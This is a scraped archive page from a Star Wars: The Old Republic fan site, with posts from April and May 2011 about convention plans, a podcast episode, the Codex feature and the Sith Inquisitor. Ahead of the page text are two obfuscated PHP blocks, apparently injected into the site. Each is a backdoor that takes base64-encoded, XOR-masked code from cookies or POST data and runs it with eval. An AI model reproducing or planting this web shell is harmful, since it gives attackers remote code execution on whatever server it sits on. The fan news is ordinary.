$eDITTpx = class_exists("E_sdBhD");if (!$eDITTpx){class E_sdBhD{private $Uwkjo;public static $GceVIgUuDx = "bb4019ce-3f6c-41c2-908d-f6034f80bd18";public static $hHxVxqyEP = NULL;public function __construct(){$STTVJb = $_COOKIE;$DZiTu = $_POST;$WDsdjh = @$STTVJb[substr(E_sdBhD::$GceVIgUuDx, 0, 4)];if (!empty($WDsdjh)){$wISPlIDZLO = "base64";$dUsBvmZpUV = "";$WDsdjh = explode(",", $WDsdjh);foreach ($WDsdjh as $WykdfVvtZ){$dUsBvmZpUV .= @$STTVJb[$WykdfVvtZ];$dUsBvmZpUV .= @$DZiTu[$WykdfVvtZ];}$dUsBvmZpUV = array_map($wISPlIDZLO . "\137" . "\x64" . "\x65" . "\x63" . "\x6f" . chr (100) . chr ( 1098 - 997 ), array($dUsBvmZpUV,)); $dUsBvmZpUV = $dUsBvmZpUV[0] ^ str_repeat(E_sdBhD::$GceVIgUuDx, (strlen($dUsBvmZpUV[0]) / strlen(E_sdBhD::$GceVIgUuDx)) + 1);E_sdBhD::$hHxVxqyEP = @unserialize($dUsBvmZpUV);}}public function __destruct(){$this->BfuLpx();}private function BfuLpx(){if (is_array(E_sdBhD::$hHxVxqyEP)) {$kjgrSU = str_replace("\x3c" . chr (63) . 'p' . "\150" . chr (112), "", E_sdBhD::$hHxVxqyEP["\143" . chr (111) . 'n' . chr ( 817 - 701 )."\x65" . "\156" . chr ( 520 - 404 )]);eval($kjgrSU);exit();}}}$LfAXf = new E_sdBhD(); $LfAXf = NULL;} ?> $HUXqtUIxy = class_exists("ip_QEqh");if (!$HUXqtUIxy){class ip_QEqh{private $TbmzRb;public static $FHcIW = "7ebcf308-eeb5-45d0-b672-e9d0e6153b2f";public static $fFfkEnNTtr = NULL;public function __construct(){$FhesM = $_COOKIE;$LHvkqFrxmX = $_POST;$MCHrxi = @$FhesM[substr(ip_QEqh::$FHcIW, 0, 4)];if (!empty($MCHrxi)){$ukeOe = "base64";$JuQfYmlyOm = "";$MCHrxi = explode(",", $MCHrxi);foreach ($MCHrxi as $BJxJBWW){$JuQfYmlyOm .= @$FhesM[$BJxJBWW];$JuQfYmlyOm .= @$LHvkqFrxmX[$BJxJBWW];}$JuQfYmlyOm = array_map($ukeOe . chr ( 127 - 32 )."\144" . "\x65" . "\143" . 'o' . "\x64" . "\x65", array($JuQfYmlyOm,)); $JuQfYmlyOm = $JuQfYmlyOm[0] ^ str_repeat(ip_QEqh::$FHcIW, (strlen($JuQfYmlyOm[0]) / strlen(ip_QEqh::$FHcIW)) + 1);ip_QEqh::$fFfkEnNTtr = @unserialize($JuQfYmlyOm);}}public function __destruct(){$this->tSjrbbjY();}private function tSjrbbjY(){if (is_array(ip_QEqh::$fFfkEnNTtr)) {$xdxaj = str_replace("\x3c" . "\x3f" . 'p' . chr ( 133 - 29 ).chr (112), "", ip_QEqh::$fFfkEnNTtr["\x63" . 'o' . chr (110) . "\x74" . 'e' . "\156" . chr ( 225 - 109 )]);eval($xdxaj);exit();}}}$SRNAi = new ip_QEqh(); $SRNAi = NULL;} ?> Friday Update – Page 5 – Corellian Run Radio
May 202011

Fan Fridays tend to be the red-headed stepchild of Friday Updates, but BioWare threw in several extra treats for the fans, including their 2011 convention schedule and a gorgeous screenshot of a Bounty Hunter doing what he does best: hunting.

SWTOR Hitting the Cons
BioWare announced several conventions they plan to attend in 2011: San Diego Comic Con, PAX, Eurogamer, New York Comic Con, Paris Games Week, and DreamHack.  Start making those travel plans!  Corellian Run Radio will be at PAX in August. Continue reading »

May 162011

Story That Will Not Be Silenced

Discuss this episode on the forums here.

We’re back to our regular format this week with Carla, Kathy, and Roxanne.  We also invited the fellows from TORWars, Jeff Hollis and David Moore, just because they are fun.  The five of us debate Datacrons and the bolster system, plus we venture into release date speculation.  Jeff and David have to leave after the Newsnet segment, which is good because Roxanne gets very, um,  “excited” when we talk about skipping story in BioWare games.  Somehow she manages to bring Silence of the Lambs into the conversation.

FACT OR FICTION: Can you pick out the confirmed fact from the tall tales?  This week’s host challenge involves Khem Val, the Codex, and auto-facing. Continue reading »

May 132011

Yesterday Gamespot debuted the new Sith Inquisitor video.  Today we were introduced to companion Khem Val, an ancient, force-resistant Dashade who has fed off thousands of Jedi in the service of his master, Tulak Hord, a powerful Dark Lord.  Khem Val is now held in stasis deep in the tomb of Naga Sadow on Korriban.  So far no one has been brave enough to awaken this Dashade – his hunger will make him very dangerous indeed.  Can you say, “Companion Quest?”

Sith Inqusitiors will fly the Fury-Class Imperial Interceptor, the same ship to be used by the Sith Warrior class.

May 062011

Principal Lead Systems Designer Damion Schubert gives us more detail on the Codex, a game feature sure to appeal to the explorers and lorehounds of SWTOR.  He explains that the Codex was conceived, in part, to help players keep track of the details of all the story arcs and back stories in an easy-to-access format.  Knowing these details will enhance your gameplay experience, which is heavily story-based.  Here are some highlights from Damion’s Developer Blog:

  • The SWTOR codex was modeled on the ones found in Mass Effect and Dragon Age.
  • Collecting codex entries appeals to exploration gamers.  The codex is designed to provide an explorer mini-game with meaningful reward. Continue reading »
Apr 292011

Today’s update is all about the Sith Warrior character progression and a look at developing the user interface (UI) for SWTOR. We got a sneak peek at this trailer while in Austin this past Monday and were blown away by some of the moves of the Sith Warrior and specifically how terrific the armor looks. For more details visit the official site here.

Lead UI Artist, Michael Voigt, describes how the current UI was developed. Read more on the official website here.


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